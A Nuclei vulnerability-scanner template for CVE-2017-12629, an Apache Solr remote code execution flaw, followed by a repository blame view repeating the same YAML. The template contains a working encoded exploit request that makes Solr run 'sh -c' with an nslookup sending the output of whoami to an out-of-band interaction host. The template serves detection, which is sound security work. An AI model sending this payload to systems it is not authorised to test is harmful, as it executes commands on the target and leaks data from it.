nuclei-templates/cves/2017/CVE-2017-12629.yaml

id: CVE-2017-12629

info:
  name: Apache Solr <= 7.1 Remote Code Execution via SSRF
  author: dwisiswant0
  severity: critical
  tags: cve,cve2017,solr,apache,rce,ssrf,oob
  reference: |
      - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
      - https://twitter.com/honoki/status/1298636315613974532/photo/1

requests:
  - raw:
      - |
        GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`id: CVE-2017-12629`

			`info:`
			`name: Apache Solr <= 7.1 Remote Code Execution via SSRF`
			`author: dwisiswant0`
			`severity: critical`
Payload and matcher update 2021-04-27 11:07:02 +00:00			`tags: cve,cve2017,solr,apache,rce,ssrf,oob`
			`reference: \|`
			`- https://nvd.nist.gov/vuln/detail/CVE-2017-12629`
			`- https://twitter.com/honoki/status/1298636315613974532/photo/1`
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00
			`requests:`
RAW requests 2021-04-27 11:25:09 +00:00			`- raw:`
			`- \|`
			`GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1`
			`Host: {{Hostname}}`
Payload and matcher update 2021-04-27 11:07:02 +00:00
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`matchers:`
			`- type: word`
Payload and matcher update 2021-04-27 11:07:02 +00:00			`part: interactsh_protocol # Confirms the DNS Interaction`
:fire: Add CVE-2017-12629 2020-08-28 03:46:31 +00:00			`words:`
Payload and matcher update 2021-04-27 11:07:02 +00:00			`- "dns"`